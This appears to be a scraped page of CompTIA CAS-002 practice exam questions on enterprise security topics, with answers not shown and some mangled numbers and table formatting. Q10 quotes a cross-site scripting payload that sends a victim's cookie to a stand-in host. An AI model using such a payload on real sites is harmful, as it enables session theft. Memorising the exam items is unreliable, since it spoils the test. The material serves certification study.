CompTIA CAS-002 Free Practice Questions

Q1. CORRECT TEXT - (Topic 3) 

An administrator wants to install a patch to an application. Given the scenario, download, verify and install the patch in the most secure manner. Instructions The last install that is completed will be the final submission 

View Answer

Q2. - (Topic 4) 

In developing a new computing lifecycle process for a large corporation, the security team is developing the process for decommissioning computing equipment. In order to reduce the potential for data leakage, which of the following should the team consider? (Select TWO). 

A. Erase all files on drive 

B. Install of standard image 

C. Remove and hold all drives 

D. Physical destruction 

E. Drive wipe 

View Answer

Q3. - (Topic 5) 

Joe, the Chief Executive Officer (CEO), was an Information security professor and a Subject Matter Expert for over 20 years. He has designed a network defense method which he says is significantly better than prominent international standards. He has recommended that the company use his cryptographic method. Which of the following methodologies should be adopted? 

A. The company should develop an in-house solution and keep the algorithm a secret. 

B. The company should use the CEO’s encryption scheme. 

C. The company should use a mixture of both systems to meet minimum standards. 

D. The company should use the method recommended by other respected information security organizations. 

View Answer

Q4. - (Topic 5) 

After a security incident, an administrator would like to implement policies that would help reduce fraud and the potential for collusion between employees. Which of the following would help meet these goals by having co-workers occasionally audit another worker's position? 

A. Least privilege 

B. Job rotation 

C. Mandatory vacation 

D. Separation of duties 

View Answer

Q5. - (Topic 4) 

Which of the following activities is commonly deemed “OUT OF SCOPE” when undertaking a penetration test? 

A. Test password complexity of all login fields and input validation of form fields 

B. Reverse engineering any thick client software that has been provided for the test 

C. Undertaking network-based denial of service attacks in production environment 

D. Attempting to perform blind SQL injection and reflected cross-site scripting attacks 

E. Running a vulnerability scanning tool to assess network and host weaknesses 

View Answer

Q6. - (Topic 1) 

A forensic analyst receives a hard drive containing malware quarantined by the antivirus application. After creating an image and determining the directory location of the malware file, which of the following helps to determine when the system became infected? 

A. The malware file’s modify, access, change time properties. 

B. The timeline analysis of the file system. 

C. The time stamp of the malware in the swap file. 

D. The date/time stamp of the malware detection in the antivirus logs. 

View Answer

Q7. - (Topic 4) 

An organization is preparing to upgrade its firewall and NIPS infrastructure and has narrowed the vendor choices down to two platforms. The integrator chosen to assist the organization with the deployment has many clients running a mixture of the possible combinations of environments. Which of the following is the MOST comprehensive method for evaluating the two platforms? 

A. Benchmark each possible solution with the integrators existing client deployments. 

B. Develop testing criteria and evaluate each environment in-house. 

C. Run virtual test scenarios to validate the potential solutions. 

D. Use results from each vendor’s test labs to determine adherence to project requirements. 

View Answer

Q8. - (Topic 4) 

The Chief Information Security Officer (CISO) regularly receives reports of a single department repeatedly violating the corporate security policy. The head of the department in question informs the CISO that the offending behaviors are a result of necessary business activities. The CISO assigns a junior security administrator to solve the issue. Which of the following is the BEST course of action for the junior security administrator to take? 

A. Work with the department head to find an acceptable way to change the business needs so the department no longer violates the corporate security policy. 

B. Draft an RFP for the purchase of a COTS product or consulting services to solve the problem through implementation of technical controls. 

C. Work with the CISO and department head to create an SLA specifying the response times of the IT security department when incidents are reported. 

D. Draft an MOU for the department head and CISO to approve, documenting the limits of the necessary behavior, and actions to be taken by both teams. 

View Answer

Q9. - (Topic 2) 

A bank has decided to outsource some existing IT functions and systems to a third party service provider. The third party service provider will manage the outsourced systems on their own premises and will continue to directly interface with the bank’s other systems through dedicated encrypted links. Which of the following is critical to ensure the successful management of system security concerns between the two organizations? 

A. ISA 

B. BIA 

C. MOU 

D. SOA 

E. BPA 

View Answer

Q10. - (Topic 1) 

A security administrator notices the following line in a server's security log: 

<input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cooki e</script>') + "' 

The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack? 

A. WAF 

B. Input validation 

C. SIEM 

D. Sandboxing 

E. DAM 

View Answer

Q11. CORRECT TEXT - (Topic 2) 

Company A has noticed abnormal behavior targeting their SQL server on the network from a rogue IP address. The company uses the following internal IP address ranges: 192.10.1.0/24 for the corporate site and 192.10.2.0/24 for the remote site. The Telco router interface uses the 192.10.5.0/30 IP range. 

Instructions: Click on the simulation button to refer to the Network Diagram for Company A. 

Click on Router 1, Router 2, and the Firewall to evaluate and configure each device. 

Task 1: Display and examine the logs and status of Router 1, Router 2, and Firewall interfaces. 

Task 2: Reconfigure the appropriate devices to prevent the attacks from continuing to target the SQL server and other servers on the corporate network. 

View Answer

Q12. - (Topic 1) 

The Chief Information Security Officer (CISO) at a company knows that many users store business documents on public cloud-based storage, and realizes this is a risk to the company. In response, the CISO implements a mandatory training course in which all employees are instructed on the proper use of cloud-based storage. Which of the following risk strategies did the CISO implement? 

A. Avoid 

B. Accept 

C. Mitigate 

D. Transfer 

View Answer

Q13. - (Topic 2) 

VPN users cannot access the active FTP server through the router but can access any server in the data center. 

Additional network information: 

DMZ network – 192.168.5.0/24 (FTP server is 192.168.5.11) 

VPN network – 192.168.1.0/24 

Datacenter – 192.168.2.0/24 

User network - 192.168.3.0/24 

HR network – 192.168.4.0/24\ 

Traffic shaper configuration: 

VLAN Bandwidth Limit (Mbps) 

VPN50 

User175 

HR250 

Finance250 

Guest0 

Router ACL: 

ActionSourceDestination 

Permit192.168.1.0/24192.168.2.0/24 

Permit192.168.1.0/24192.168.3.0/24 

Permit192.168.1.0/24192.168.5.0/24 

Permit192.168.2.0/24192.168.1.0/24 

Permit192.168.3.0/24192.168.1.0/24 

Permit192.168.5.1/32192.168.1.0/24 

Deny192.168.4.0/24192.168.1.0/24 

Deny192.168.1.0/24192.168.4.0/24 

Denyanyany 

Which of the following solutions would allow the users to access the active FTP server? 

A. Add a permit statement to allow traffic from 192.168.5.0/24 to the VPN network 

B. Add a permit statement to allow traffic to 192.168.5.1 from the VPN network 

C. IPS is blocking traffic and needs to be reconfigured 

D. Configure the traffic shaper to limit DMZ traffic 

E. Increase bandwidth limit on the VPN network 

View Answer

Q14. DRAG DROP - (Topic 3) 

Company A has experienced external attacks on their network and wants to minimize the attacks from reoccurring. Modify the network diagram to prevent SQL injections. XSS attacks, smurf attacks, e-mail spam, downloaded malware. viruses and ping attacks. The company can spend a MAXIMUM of 550.000 USD. A cost list for each item is listed below 

1. Anti-Virus Server- $10,000 2 Firewall-$15,000 3 Load Balanced Server - $10,000 4 NIDS/NIPS-$10,000 

5. Packet Analyzer-55.000 6 Patch Server-$15,000 7 Proxy Server-$20,000 8. Router - S10.000 9 Spam Filter - S5 000 10 Traffic Shaper - $20,000 

11. Web Application Firewall - $10,000 

Instructions: Not all placeholders in the diagram need to be filled and items can only be used once. 

View Answer

Q15. - (Topic 5) 

Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim’s privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed. Which of the following BEST describes the application issue? 

A. Integer overflow 

B. Click-jacking 

C. Race condition 

D. SQL injection 

E. Use after free 

F. Input validation 

View Answer